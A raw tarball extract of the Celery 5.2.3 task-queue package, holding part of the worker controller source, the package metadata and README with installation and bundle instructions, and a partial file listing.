datetime import datetime from billiard import cpu_count from kombu.utils.compat import detect_environment from celery import bootsteps from celery import concurrency as _concurrency from celery import signals from celery.bootsteps import RUN, TERMINATE from celery.exceptions import (ImproperlyConfigured, TaskRevokedError, WorkerTerminate) from celery.platforms import EX_FAILURE, create_pidlock from celery.utils.imports import reload_from_cwd from celery.utils.log import mlevel from celery.utils.log import worker_logger as logger from celery.utils.nodenames import default_nodename, worker_direct from celery.utils.text import str_to_list from celery.utils.threads import default_socket_timeout from . import state try: import resource except ImportError: # pragma: no cover resource = None __all__ = ('WorkController',) #: Default socket timeout at shutdown. SHUTDOWN_SOCKET_TIMEOUT = 5.0 SELECT_UNKNOWN_QUEUE = """ Trying to select queue subset of {0!r}, but queue {1} isn't defined in the `task_queues` setting. If you want to automatically declare unknown queues you can enable the `task_create_missing_queues` setting. """ DESELECT_UNKNOWN_QUEUE = """ Trying to deselect queue subset of {0!r}, but queue {1} isn't defined in the `task_queues` setting. """ class WorkController: """Unmanaged worker instance.""" app = None pidlock = None blueprint = None pool = None semaphore = None #: contains the exit code if a :exc:`SystemExit` event is handled. exitcode = None class Blueprint(bootsteps.Blueprint): """Worker bootstep blueprint.""" name = 'Worker' default_steps = { 'celery.worker.components:Hub', 'celery.worker.components:Pool', 'celery.worker.components:Beat', 'celery.worker.components:Timer', 'celery.worker.components:StateDB', 'celery.worker.components:Consumer', 'celery.worker.autoscale:WorkerComponent', } def __init__(self, app=None, hostname=None, **kwargs): self.app = app or self.app self.hostname = default_nodename(hostname) self.startup_time = datetime.utcnow() self.app.loader.init_worker() self.on_before_init(**kwargs) self.setup_defaults(**kwargs) self.on_after_init(**kwargs) self.setup_instance(**self.prepare_args(**kwargs)) def setup_instance(self, queues=None, ready_callback=None, pidfile=None, include=None, use_eventloop=None, exclude_queues=None, **kwargs): self.pidfile = pidfile self.setup_queues(queues, exclude_queues) self.setup_includes(str_to_list(include)) # Set default concurrency if not self.concurrency: try: self.concurrency = cpu_count() except NotImplementedError: self.concurrency = 2 # Options self.loglevel = mlevel(self.loglevel) self.ready_callback = ready_callback or self.on_consumer_ready # this connection won't establish, only used for params self._conninfo = self.app.connection_for_read() self.use_eventloop = ( self.should_use_eventloop() if use_eventloop is None else use_eventloop ) self.options = kwargs signals.worker_init.send(sender=self) # Initialize bootsteps self.pool_cls = _concurrency.get_implementation(self.pool_cls) self.steps = [] self.on_init_blueprint() self.blueprint = self.Blueprint( steps=self.app.steps['worker'], on_start=self.on_start, on_close=self.on_close, on_stopped=self.on_stopped, ) self.blueprint.apply(self, **kwargs) def on_init_blueprint(self): pass def on_before_init(self, **kwargs): pass def on_after_init(self, **kwargs): pass def on_start(self): if self.pidfile: self.pidlock = create_pidlock(self.pidfile) def on_consumer_ready(self, consumer): pass def on_close(self): self.app.loader.shutdown_worker() def on_stopped(self): self.timer.stop() self.consumer.shutdown() if self.pidlock: self.pidlock.release() def setup_queues(self, include, exclude=None): include = str_to_list(include) exclude = str_to_list(exclude) try: self.app.amqp.queues.select(include) except KeyError as exc: raise ImproperlyConfigured( SELECT_UNKNOWN_QUEUE.strip().format(include, exc)) try: self.app.amqp.queues.deselect(exclude) except KeyError as exc: raise ImproperlyConfigured( DESELECT_UNKNOWN_QUEUE.strip().format(exclude, exc)) if self.app.conf.worker_direct: self.app.amqp.queues.select_add(worker_direct(self.hostname)) def setup_includes(self, includes): # Update celery_include to have all known task modules, so that we # ensure all task modules are imported in case an execv happens. prev = tuple(self.app.conf.include) if includes: prev += tuple(includes) [self.app.loader.import_task_module(m) for m in includes] self.include = includes task_modules = {task.__class__.__module__ for task in self.app.tasks.values()} self.app.conf.include = tuple(set(prev) | task_modules) def prepare_args(self, **kwargs): return kwargs def _send_worker_shutdown(self): signals.worker_shutdown.send(sender=self) def start(self): try: self.blueprint.start(self) except WorkerTerminate: self.terminate() except Exception as exc: logger.critical('Unrecoverable error: %r', exc, exc_info=True) self.stop(exitcode=EX_FAILURE) except SystemExit as exc: self.stop(exitcode=exc.code) except KeyboardInterrupt: self.stop(exitcode=EX_FAILURE) def register_with_event_loop(self, hub): self.blueprint.send_all( self, 'register_with_event_loop', args=(hub,), description='hub.register', ) def _process_task_sem(self, req): return self._quick_acquire(self._process_task, req) def _process_task(self, req): """Process task by sending it to the pool of workers.""" try: req.execute_using_pool(self.pool) except TaskRevokedError: try: self._quick_release() # Issue 877 except AttributeError: pass def signal_consumer_close(self): try: self.consumer.close() except AttributeError: pass def should_use_eventloop(self): return (detect_environment() == 'default' and self._conninfo.transport.implements.asynchronous and not self.app.IS_WINDOWS) def stop(self, in_sighandler=False, exitcode=None): """Graceful shutdown of the worker server.""" if exitcode is not None: self.exitcode = exitcode if self.blueprint.state == RUN: self.signal_consumer_close() if not in_sighandler or self.pool.signal_safe: self._shutdown(warm=True) self._send_worker_shutdown() def terminate(self, in_sighandler=False): """Not so graceful shutdown of the worker server.""" if self.blueprint.state != TERMINATE: self.signal_consumer_close() if not in_sighandler or self.pool.signal_safe: self._shutdown(warm=False) def _shutdown(self, warm=True): # if blueprint does not exist it means that we had an # error before the bootsteps could be initialized. if self.blueprint is not None: with default_socket_timeout(SHUTDOWN_SOCKET_TIMEOUT): # Issue 975 self.blueprint.stop(self, terminate=not warm) self.blueprint.join() def reload(self, modules=None, reload=False, reloader=None): list(self._reload_modules( modules, force_reload=reload, reloader=reloader)) if self.consumer: self.consumer.update_strategies() self.consumer.reset_rate_limits() try: self.pool.restart() except NotImplementedError: pass def _reload_modules(self, modules=None, **kwargs): return ( self._maybe_reload_module(m, **kwargs) for m in set(self.app.loader.task_modules if modules is None else (modules or ())) ) def _maybe_reload_module(self, module, force_reload=False, reloader=None): if module not in sys.modules: logger.debug('importing module %s', module) return self.app.loader.import_from_cwd(module) elif force_reload: logger.debug('reloading module %s', module) return reload_from_cwd(sys.modules[module], reloader) def info(self): uptime = datetime.utcnow() - self.startup_time return {'total': self.state.total_count, 'pid': os.getpid(), 'clock': str(self.app.clock), 'uptime': round(uptime.total_seconds())} def rusage(self): if resource is None: raise NotImplementedError('rusage not supported by this platform') s = resource.getrusage(resource.RUSAGE_SELF) return { 'utime': s.ru_utime, 'stime': s.ru_stime, 'maxrss': s.ru_maxrss, 'ixrss': s.ru_ixrss, 'idrss': s.ru_idrss, 'isrss': s.ru_isrss, 'minflt': s.ru_minflt, 'majflt': s.ru_majflt, 'nswap': s.ru_nswap, 'inblock': s.ru_inblock, 'oublock': s.ru_oublock, 'msgsnd': s.ru_msgsnd, 'msgrcv': s.ru_msgrcv, 'nsignals': s.ru_nsignals, 'nvcsw': s.ru_nvcsw, 'nivcsw': s.ru_nivcsw, } def stats(self): info = self.info() info.update(self.blueprint.info(self)) info.update(self.consumer.blueprint.info(self.consumer)) try: info['rusage'] = self.rusage() except NotImplementedError: info['rusage'] = 'N/A' return info def __repr__(self): """``repr(worker)``.""" return ''.format( self=self, state=self.blueprint.human_state() if self.blueprint else 'INIT', ) def __str__(self): """``str(worker) == worker.hostname``.""" return self.hostname @property def state(self): return state def setup_defaults(self, concurrency=None, loglevel='WARN', logfile=None, task_events=None, pool=None, consumer_cls=None, timer_cls=None, timer_precision=None, autoscaler_cls=None, pool_putlocks=None, pool_restarts=None, optimization=None, O=None, # O maps to -O=fair statedb=None, time_limit=None, soft_time_limit=None, scheduler=None, pool_cls=None, # XXX use pool state_db=None, # XXX use statedb task_time_limit=None, # XXX use time_limit task_soft_time_limit=None, # XXX use soft_time_limit scheduler_cls=None, # XXX use scheduler schedule_filename=None, max_tasks_per_child=None, prefetch_multiplier=None, disable_rate_limits=None, worker_lost_wait=None, max_memory_per_child=None, **_kw): either = self.app.either self.loglevel = loglevel self.logfile = logfile self.concurrency = either('worker_concurrency', concurrency) self.task_events = either('worker_send_task_events', task_events) self.pool_cls = either('worker_pool', pool, pool_cls) self.consumer_cls = either('worker_consumer', consumer_cls) self.timer_cls = either('worker_timer', timer_cls) self.timer_precision = either( 'worker_timer_precision', timer_precision, ) self.optimization = optimization or O self.autoscaler_cls = either('worker_autoscaler', autoscaler_cls) self.pool_putlocks = either('worker_pool_putlocks', pool_putlocks) self.pool_restarts = either('worker_pool_restarts', pool_restarts) self.statedb = either('worker_state_db', statedb, state_db) self.schedule_filename = either( 'beat_schedule_filename', schedule_filename, ) self.scheduler = either('beat_scheduler', scheduler, scheduler_cls) self.time_limit = either( 'task_time_limit', time_limit, task_time_limit) self.soft_time_limit = either( 'task_soft_time_limit', soft_time_limit, task_soft_time_limit, ) self.max_tasks_per_child = either( 'worker_max_tasks_per_child', max_tasks_per_child, ) self.max_memory_per_child = either( 'worker_max_memory_per_child', max_memory_per_child, ) self.prefetch_multiplier = int(either( 'worker_prefetch_multiplier', prefetch_multiplier, )) self.disable_rate_limits = either( 'worker_disable_rate_limits', disable_rate_limits, ) self.worker_lost_wait = either('worker_lost_wait', worker_lost_wait) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.351749 celery-5.2.3/celery.egg-info/0000775000175000017500000000000000000000000015652 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/PKG-INFO0000664000175000017500000004261400000000000016756 0ustar00asifasif00000000000000Metadata-Version: 2.1 Name: celery Version: 5.2.3 Summary: Distributed Task Queue. Home-page: http://celeryproject.org Author: Ask Solem Author-email: auvipy@gmail.com License: BSD Project-URL: Documentation, https://docs.celeryproject.org/en/latest/index.html Project-URL: Changelog, https://docs.celeryproject.org/en/stable/changelog.html Project-URL: Code, https://github.com/celery/celery Project-URL: Tracker, https://github.com/celery/celery/issues Project-URL: Funding, https://opencollective.com/celery Keywords: task job queue distributed messaging actor Platform: any Classifier: Development Status :: 5 - Production/Stable Classifier: License :: OSI Approved :: BSD License Classifier: Topic :: System :: Distributed Computing Classifier: Topic :: Software Development :: Object Brokering Classifier: Framework :: Celery Classifier: Programming Language :: Python Classifier: Programming Language :: Python :: 3 :: Only Classifier: Programming Language :: Python :: 3 Classifier: Programming Language :: Python :: 3.7 Classifier: Programming Language :: Python :: 3.8 Classifier: Programming Language :: Python :: 3.9 Classifier: Programming Language :: Python :: 3.10 Classifier: Programming Language :: Python :: Implementation :: CPython Classifier: Programming Language :: Python :: Implementation :: PyPy Classifier: Operating System :: OS Independent Requires-Python: >=3.7, Provides-Extra: dynamodb Provides-Extra: consul Provides-Extra: auth Provides-Extra: sqlalchemy Provides-Extra: memcache Provides-Extra: pyro Provides-Extra: yaml Provides-Extra: pytest Provides-Extra: zookeeper Provides-Extra: mongodb Provides-Extra: azureblockblob Provides-Extra: sqs Provides-Extra: cosmosdbsql Provides-Extra: django Provides-Extra: brotli Provides-Extra: eventlet Provides-Extra: librabbitmq Provides-Extra: couchdb Provides-Extra: arangodb Provides-Extra: tblib Provides-Extra: redis Provides-Extra: slmq Provides-Extra: msgpack Provides-Extra: elasticsearch Provides-Extra: cassandra Provides-Extra: gevent Provides-Extra: zstd Provides-Extra: pymemcache Provides-Extra: couchbase Provides-Extra: s3 Provides-Extra: solar License-File: LICENSE .. image:: http://docs.celeryproject.org/en/latest/_images/celery-banner-small.png |build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge| :Version: 5.2.3 (dawn-chorus) :Web: https://docs.celeryproject.org/en/stable/index.html :Download: https://pypi.org/project/celery/ :Source: https://github.com/celery/celery/ :Keywords: task, queue, job, async, rabbitmq, amqp, redis, python, distributed, actors Donations ========= This project relies on your generous donations. If you are using Celery to create a commercial product, please consider becoming our `backer`_ or our `sponsor`_ to ensure Celery's future. .. _`backer`: https://opencollective.com/celery#backer .. _`sponsor`: https://opencollective.com/celery#sponsor For enterprise ============== Available as part of the Tidelift Subscription. The maintainers of ``celery`` and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. `Learn more. `_ What's a Task Queue? ==================== Task queues are used as a mechanism to distribute work across threads or machines. A task queue's input is a unit of work, called a task, dedicated worker processes then constantly monitor the queue for new work to perform. Celery communicates via messages, usually using a broker to mediate between clients and workers. To initiate a task a client puts a message on the queue, the broker then delivers the message to a worker. A Celery system can consist of multiple workers and brokers, giving way to high availability and horizontal scaling. Celery is written in Python, but the protocol can be implemented in any language. In addition to Python there's node-celery_ for Node.js, a `PHP client`_, `gocelery`_ for golang, and rusty-celery_ for Rust. Language interoperability can also be achieved by using webhooks in such a way that the client enqueues an URL to be requested by a worker. .. _node-celery: https://github.com/mher/node-celery .. _`PHP client`: https://github.com/gjedeer/celery-php .. _`gocelery`: https://github.com/gocelery/gocelery .. _rusty-celery: https://github.com/rusty-celery/rusty-celery What do I need? =============== Celery version 5.2.0 runs on, - Python (3.7, 3.8, 3.9, 3.10) - PyPy3.7 (7.3.7+) This is the version of celery which will support Python 3.7 or newer. If you're running an older version of Python, you need to be running an older version of Celery: - Python 2.6: Celery series 3.1 or earlier. - Python 2.5: Celery series 3.0 or earlier. - Python 2.4: Celery series 2.2 or earlier. - Python 2.7: Celery 4.x series. - Python 3.6: Celery 5.1 or earlier. Celery is a project with minimal funding, so we don't support Microsoft Windows. Please don't open any issues related to that platform. *Celery* is usually used with a message broker to send and receive messages. The RabbitMQ, Redis transports are feature complete, but there's also experimental support for a myriad of other solutions, including using SQLite for local development. *Celery* can run on a single machine, on multiple machines, or even across datacenters. Get Started =========== If this is the first time you're trying to use Celery, or you're new to Celery v5.2.0 coming from previous versions then you should read our getting started tutorials: - `First steps with Celery`_ Tutorial teaching you the bare minimum needed to get started with Celery. - `Next steps`_ A more complete overview, showing more features. .. _`First steps with Celery`: http://docs.celeryproject.org/en/latest/getting-started/first-steps-with-celery.html .. _`Next steps`: http://docs.celeryproject.org/en/latest/getting-started/next-steps.html You can also get started with Celery by using a hosted broker transport CloudAMQP. The largest hosting provider of RabbitMQ is a proud sponsor of Celery. Celery is... ============= - **Simple** Celery is easy to use and maintain, and does *not need configuration files*. It has an active, friendly community you can talk to for support, like at our `mailing-list`_, or the IRC channel. Here's one of the simplest applications you can make: .. code-block:: python from celery import Celery app = Celery('hello', broker='amqp://guest@localhost//') @app.task def hello(): return 'hello world' - **Highly Available** Workers and clients will automatically retry in the event of connection loss or failure, and some brokers support HA in way of *Primary/Primary* or *Primary/Replica* replication. - **Fast** A single Celery process can process millions of tasks a minute, with sub-millisecond round-trip latency (using RabbitMQ, py-librabbitmq, and optimized settings). - **Flexible** Almost every part of *Celery* can be extended or used on its own, Custom pool implementations, serializers, compression schemes, logging, schedulers, consumers, producers, broker transports, and much more. It supports... ================ - **Message Transports** - RabbitMQ_, Redis_, Amazon SQS - **Concurrency** - Prefork, Eventlet_, gevent_, single threaded (``solo``) - **Result Stores** - AMQP, Redis - memcached - SQLAlchemy, Django ORM - Apache Cassandra, IronCache, Elasticsearch - **Serialization** - *pickle*, *json*, *yaml*, *msgpack*. - *zlib*, *bzip2* compression. - Cryptographic message signing. .. _`Eventlet`: http://eventlet.net/ .. _`gevent`: http://gevent.org/ .. _RabbitMQ: https://rabbitmq.com .. _Redis: https://redis.io .. _SQLAlchemy: http://sqlalchemy.org Framework Integration ===================== Celery is easy to integrate with web frameworks, some of which even have integration packages: +--------------------+------------------------+ | `Django`_ | not needed | +--------------------+------------------------+ | `Pyramid`_ | `pyramid_celery`_ | +--------------------+------------------------+ | `Pylons`_ | `celery-pylons`_ | +--------------------+------------------------+ | `Flask`_ | not needed | +--------------------+------------------------+ | `web2py`_ | `web2py-celery`_ | +--------------------+------------------------+ | `Tornado`_ | `tornado-celery`_ | +--------------------+------------------------+ The integration packages aren't strictly necessary, but they can make development easier, and sometimes they add important hooks like closing database connections at ``fork``. .. _`Django`: https://djangoproject.com/ .. _`Pylons`: http://pylonsproject.org/ .. _`Flask`: http://flask.pocoo.org/ .. _`web2py`: http://web2py.com/ .. _`Bottle`: https://bottlepy.org/ .. _`Pyramid`: http://docs.pylonsproject.org/en/latest/docs/pyramid.html .. _`pyramid_celery`: https://pypi.org/project/pyramid_celery/ .. _`celery-pylons`: https://pypi.org/project/celery-pylons/ .. _`web2py-celery`: https://code.google.com/p/web2py-celery/ .. _`Tornado`: http://www.tornadoweb.org/ .. _`tornado-celery`: https://github.com/mher/tornado-celery/ .. _celery-documentation: Documentation ============= The `latest documentation`_ is hosted at Read The Docs, containing user guides, tutorials, and an API reference. 最新的中文文档托管在 https://www.celerycn.io/ 中,包含用户指南、教程、API接口等。 .. _`latest documentation`: http://docs.celeryproject.org/en/latest/ .. _celery-installation: Installation ============ You can install Celery either via the Python Package Index (PyPI) or from source. To install using ``pip``: :: $ pip install -U Celery .. _bundles: Bundles ------- Celery also defines a group of bundles that can be used to install Celery and the dependencies for a given feature. You can specify these in your requirements or on the ``pip`` command-line by using brackets. Multiple bundles can be specified by separating them by commas. :: $ pip install "celery[amqp]" $ pip install "celery[amqp,redis,auth,msgpack]" The following bundles are available: Serializers ~~~~~~~~~~~ :``celery[auth]``: for using the ``auth`` security serializer. :``celery[msgpack]``: for using the msgpack serializer. :``celery[yaml]``: for using the yaml serializer. Concurrency ~~~~~~~~~~~ :``celery[eventlet]``: for using the ``eventlet`` pool. :``celery[gevent]``: for using the ``gevent`` pool. Transports and Backends ~~~~~~~~~~~~~~~~~~~~~~~ :``celery[amqp]``: for using the RabbitMQ amqp python library. :``celery[redis]``: for using Redis as a message transport or as a result backend. :``celery[sqs]``: for using Amazon SQS as a message transport. :``celery[tblib``]: for using the ``task_remote_tracebacks`` feature. :``celery[memcache]``: for using Memcached as a result backend (using ``pylibmc``) :``celery[pymemcache]``: for using Memcached as a result backend (pure-Python implementation). :``celery[cassandra]``: for using Apache Cassandra as a result backend with DataStax driver. :``celery[azureblockblob]``: for using Azure Storage as a result backend (using ``azure-storage``) :``celery[s3]``: for using S3 Storage as a result backend. :``celery[couchbase]``: for using Couchbase as a result backend. :``celery[arangodb]``: for using ArangoDB as a result backend. :``celery[elasticsearch]``: for using Elasticsearch as a result backend. :``celery[riak]``: for using Riak as a result backend. :``celery[cosmosdbsql]``: for using Azure Cosmos DB as a result backend (using ``pydocumentdb``) :``celery[zookeeper]``: for using Zookeeper as a message transport. :``celery[sqlalchemy]``: for using SQLAlchemy as a result backend (*supported*). :``celery[pyro]``: for using the Pyro4 message transport (*experimental*). :``celery[slmq]``: for using the SoftLayer Message Queue transport (*experimental*). :``celery[consul]``: for using the Consul.io Key/Value store as a message transport or result backend (*experimental*). :``celery[django]``: specifies the lowest version possible for Django support. You should probably not use this in your requirements, it's here for informational purposes only. .. _celery-installing-from-source: Downloading and installing from source -------------------------------------- Download the latest version of Celery from PyPI: https://pypi.org/project/celery/ You can install it by doing the following,: :: $ tar xvfz celery-0.0.0.tar.gz $ cd celery-0.0.0 $ python setup.py build # python setup.py install The last command must be executed as a privileged user if you aren't currently using a virtualenv. .. _celery-installing-from-git: Using the development version ----------------------------- With pip ~~~~~~~~ The Celery development version also requires the development versions of ``kombu``, ``amqp``, ``billiard``, and ``vine``. You can install the latest snapshot of these using the following pip commands: :: $ pip install https://github.com/celery/celery/zipball/master#egg=celery $ pip install https://github.com/celery/billiard/zipball/master#egg=billiard $ pip install https://github.com/celery/py-amqp/zipball/master#egg=amqp $ pip install https://github.com/celery/kombu/zipball/master#egg=kombu $ pip install https://github.com/celery/vine/zipball/master#egg=vine With git ~~~~~~~~ Please see the Contributing section. .. _getting-help: Getting Help ============ .. _mailing-list: Mailing list ------------ For discussions about the usage, development, and future of Celery, please join the `celery-users`_ mailing list. .. _`celery-users`: https://groups.google.com/group/celery-users/ .. _irc-channel: IRC --- Come chat with us on IRC. The **#celery** channel is located at the `Libera Chat`_ network. .. _`Libera Chat`: https://libera.chat/ .. _bug-tracker: Bug tracker =========== If you have any suggestions, bug reports, or annoyances please report them to our issue tracker at https://github.com/celery/celery/issues/ .. _wiki: Wiki ==== https://github.com/celery/celery/wiki Credits ======= .. _contributing-short: Contributors ------------ This project exists thanks to all the people who contribute. Development of `celery` happens at GitHub: https://github.com/celery/celery You're highly encouraged to participate in the development of `celery`. If you don't like GitHub (for some reason) you're welcome to send regular patches. Be sure to also read the `Contributing to Celery`_ section in the documentation. .. _`Contributing to Celery`: http://docs.celeryproject.org/en/master/contributing.html |oc-contributors| .. |oc-contributors| image:: https://opencollective.com/celery/contributors.svg?width=890&button=false :target: https://github.com/celery/celery/graphs/contributors Backers ------- Thank you to all our backers! 🙏 [`Become a backer`_] .. _`Become a backer`: https://opencollective.com/celery#backer |oc-backers| .. |oc-backers| image:: https://opencollective.com/celery/backers.svg?width=890 :target: https://opencollective.com/celery#backers Sponsors -------- Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [`Become a sponsor`_] .. _`Become a sponsor`: https://opencollective.com/celery#sponsor |oc-sponsors| .. |oc-sponsors| image:: https://opencollective.com/celery/sponsor/0/avatar.svg :target: https://opencollective.com/celery/sponsor/0/website .. _license: License ======= This software is licensed under the `New BSD License`. See the ``LICENSE`` file in the top distribution directory for the full license text. .. # vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround .. |build-status| image:: https://github.com/celery/celery/actions/workflows/python-package.yml/badge.svg :alt: Build status :target: https://github.com/celery/celery/actions/workflows/python-package.yml .. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=master :target: https://codecov.io/github/celery/celery?branch=master .. |license| image:: https://img.shields.io/pypi/l/celery.svg :alt: BSD License :target: https://opensource.org/licenses/BSD-3-Clause .. |wheel| image:: https://img.shields.io/pypi/wheel/celery.svg :alt: Celery can be installed via wheel :target: https://pypi.org/project/celery/ .. |pyversion| image:: https://img.shields.io/pypi/pyversions/celery.svg :alt: Supported Python versions. :target: https://pypi.org/project/celery/ .. |pyimp| image:: https://img.shields.io/pypi/implementation/celery.svg :alt: Supported Python implementations. :target: https://pypi.org/project/celery/ .. |ocbackerbadge| image:: https://opencollective.com/celery/backers/badge.svg :alt: Backers on Open Collective :target: #backers .. |ocsponsorbadge| image:: https://opencollective.com/celery/sponsors/badge.svg :alt: Sponsors on Open Collective :target: #sponsors .. |downloads| image:: https://pepy.tech/badge/celery :alt: Downloads :target: https://pepy.tech/project/celery ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/SOURCES.txt0000664000175000017500000005040600000000000017543 0ustar00asifasif00000000000000CONTRIBUTORS.txt Changelog.rst LICENSE MANIFEST.in README.rst TODO pyproject.toml setup.cfg setup.py celery/__init__.py celery/__main__.py celery/_state.py celery/beat.py celery/bootsteps.py celery/canvas.py celery/exceptions.py celery/local.py celery/platforms.py celery/result.py celery/schedules.py celery/signals.py celery/states.py celery.egg-info/PKG-INFO celery.egg-info/SOURCES.txt celery.egg-info/dependency_links.txt celery.egg-info/entry_points.txt celery.egg-info/not-zip-safe celery.egg-info/requires.txt celery.egg-info/top_level.txt celery/app/__init__.py celery/app/amqp.py celery/app/annotations.py celery/app/autoretry.py celery/app/backends.py celery/app/base.py celery/app/builtins.py celery/app/control.py celery/app/defaults.py celery/app/events.py celery/app/log.py celery/app/registry.py celery/app/routes.py celery/app/task.py celery/app/trace.py celery/app/utils.py celery/apps/__init__.py celery/apps/beat.py celery/apps/multi.py celery/apps/worker.py celery/backends/__init__.py celery/backends/arangodb.py celery/backends/asynchronous.py celery/backends/azureblockblob.py celery/backends/base.py celery/backends/cache.py celery/backends/cassandra.py celery/backends/consul.py celery/backends/cosmosdbsql.py celery/backends/couchbase.py celery/backends/couchdb.py celery/backends/dynamodb.py celery/backends/elasticsearch.py celery/backends/filesystem.py celery/backends/mongodb.py celery/backends/redis.py celery/backends/rpc.py celery/backends/s3.py celery/backends/database/__init__.py celery/backends/database/models.py celery/backends/database/session.py celery/bin/__init__.py celery/bin/amqp.py celery/bin/base.py celery/bin/beat.py celery/bin/call.py celery/bin/celery.py celery/bin/control.py celery/bin/events.py celery/bin/graph.py celery/bin/list.py celery/bin/logtool.py celery/bin/migrate.py celery/bin/multi.py celery/bin/purge.py celery/bin/result.py celery/bin/shell.py celery/bin/upgrade.py celery/bin/worker.py celery/concurrency/__init__.py celery/concurrency/asynpool.py celery/concurrency/base.py celery/concurrency/eventlet.py celery/concurrency/gevent.py celery/concurrency/prefork.py celery/concurrency/solo.py celery/concurrency/thread.py celery/contrib/__init__.py celery/contrib/abortable.py celery/contrib/migrate.py celery/contrib/pytest.py celery/contrib/rdb.py celery/contrib/sphinx.py celery/contrib/testing/__init__.py celery/contrib/testing/app.py celery/contrib/testing/manager.py celery/contrib/testing/mocks.py celery/contrib/testing/tasks.py celery/contrib/testing/worker.py celery/events/__init__.py celery/events/cursesmon.py celery/events/dispatcher.py celery/events/dumper.py celery/events/event.py celery/events/receiver.py celery/events/snapshot.py celery/events/state.py celery/fixups/__init__.py celery/fixups/django.py celery/loaders/__init__.py celery/loaders/app.py celery/loaders/base.py celery/loaders/default.py celery/security/__init__.py celery/security/certificate.py celery/security/key.py celery/security/serialization.py celery/security/utils.py celery/utils/__init__.py celery/utils/abstract.py celery/utils/collections.py celery/utils/debug.py celery/utils/deprecated.py celery/utils/functional.py celery/utils/graph.py celery/utils/imports.py celery/utils/iso8601.py celery/utils/log.py celery/utils/nodenames.py celery/utils/objects.py celery/utils/saferepr.py celery/utils/serialization.py celery/utils/sysinfo.py celery/utils/term.py celery/utils/text.py celery/utils/threads.py celery/utils/time.py celery/utils/timer2.py celery/utils/dispatch/__init__.py celery/utils/dispatch/signal.py celery/utils/static/__init__.py celery/utils/static/celery_128.png celery/worker/__init__.py celery/worker/autoscale.py celery/worker/components.py celery/worker/control.py celery/worker/heartbeat.py celery/worker/loops.py celery/worker/pidbox.py celery/worker/request.py celery/worker/state.py celery/worker/strategy.py celery/worker/worker.py celery/worker/consumer/__init__.py celery/worker/consumer/agent.py celery/worker/consumer/connection.py celery/worker/consumer/consumer.py celery/worker/consumer/control.py celery/worker/consumer/events.py celery/worker/consumer/gossip.py celery/worker/consumer/heart.py celery/worker/consumer/mingle.py celery/worker/consumer/tasks.py docs/AUTHORS.txt docs/Makefile docs/THANKS docs/changelog.rst docs/community.rst docs/conf.py docs/configuration.html docs/contributing.rst docs/copyright.rst docs/faq.rst docs/glossary.rst docs/index.rst docs/make.bat docs/spelling_wordlist.txt docs/whatsnew-5.2.rst docs/_ext/celerydocs.py docs/_static/.keep docs/_templates/sidebardonations.html docs/django/first-steps-with-django.rst docs/django/index.rst docs/getting-started/first-steps-with-celery.rst docs/getting-started/index.rst docs/getting-started/introduction.rst docs/getting-started/next-steps.rst docs/getting-started/resources.rst docs/getting-started/backends-and-brokers/index.rst docs/getting-started/backends-and-brokers/rabbitmq.rst docs/getting-started/backends-and-brokers/redis.rst docs/getting-started/backends-and-brokers/sqs.rst docs/history/changelog-1.0.rst docs/history/changelog-2.0.rst docs/history/changelog-2.1.rst docs/history/changelog-2.2.rst docs/history/changelog-2.3.rst docs/history/changelog-2.4.rst docs/history/changelog-2.5.rst docs/history/changelog-3.0.rst docs/history/changelog-3.1.rst docs/history/changelog-4.0.rst docs/history/changelog-4.1.rst docs/history/changelog-4.2.rst docs/history/changelog-4.3.rst docs/history/changelog-4.4.rst docs/history/changelog-5.0.rst docs/history/changelog-5.1.rst docs/history/index.rst docs/history/whatsnew-2.5.rst docs/history/whatsnew-3.0.rst docs/history/whatsnew-3.1.rst docs/history/whatsnew-4.0.rst docs/history/whatsnew-4.1.rst docs/history/whatsnew-4.2.rst docs/history/whatsnew-4.3.rst docs/history/whatsnew-4.4.rst docs/history/whatsnew-5.0.rst docs/history/whatsnew-5.1.rst docs/images/celery-banner-small.png docs/images/celery-banner.png docs/images/celery_128.png docs/images/celery_512.png docs/images/celeryevshotsm.jpg docs/images/dashboard.png docs/images/favicon.ico docs/images/monitor.png docs/images/result_graph.png docs/images/worker_graph_full.png docs/includes/installation.txt docs/includes/introduction.txt docs/includes/resources.txt docs/internals/app-overview.rst docs/internals/deprecation.rst docs/internals/guide.rst docs/internals/index.rst docs/internals/protocol.rst docs/internals/worker.rst docs/internals/reference/celery._state.rst docs/internals/reference/celery.app.annotations.rst docs/internals/reference/celery.app.routes.rst docs/internals/reference/celery.app.trace.rst docs/internals/reference/celery.backends.arangodb.rst docs/internals/reference/celery.backends.asynchronous.rst docs/internals/reference/celery.backends.azureblockblob.rst docs/internals/reference/celery.backends.base.rst docs/internals/reference/celery.backends.cache.rst docs/internals/reference/celery.backends.cassandra.rst docs/internals/reference/celery.backends.consul.rst docs/internals/reference/celery.backends.cosmosdbsql.rst docs/internals/reference/celery.backends.couchbase.rst docs/internals/reference/celery.backends.couchdb.rst docs/internals/reference/celery.backends.database.models.rst docs/internals/reference/celery.backends.database.rst docs/internals/reference/celery.backends.database.session.rst docs/internals/reference/celery.backends.dynamodb.rst docs/internals/reference/celery.backends.elasticsearch.rst docs/internals/reference/celery.backends.filesystem.rst docs/internals/reference/celery.backends.mongodb.rst docs/internals/reference/celery.backends.redis.rst docs/internals/reference/celery.backends.rpc.rst docs/internals/reference/celery.backends.rst docs/internals/reference/celery.backends.s3.rst docs/internals/reference/celery.concurrency.base.rst docs/internals/reference/celery.concurrency.eventlet.rst docs/internals/reference/celery.concurrency.gevent.rst docs/internals/reference/celery.concurrency.prefork.rst docs/internals/reference/celery.concurrency.rst docs/internals/reference/celery.concurrency.solo.rst docs/internals/reference/celery.concurrency.thread.rst docs/internals/reference/celery.events.cursesmon.rst docs/internals/reference/celery.events.dumper.rst docs/internals/reference/celery.events.snapshot.rst docs/internals/reference/celery.platforms.rst docs/internals/reference/celery.security.certificate.rst docs/internals/reference/celery.security.key.rst 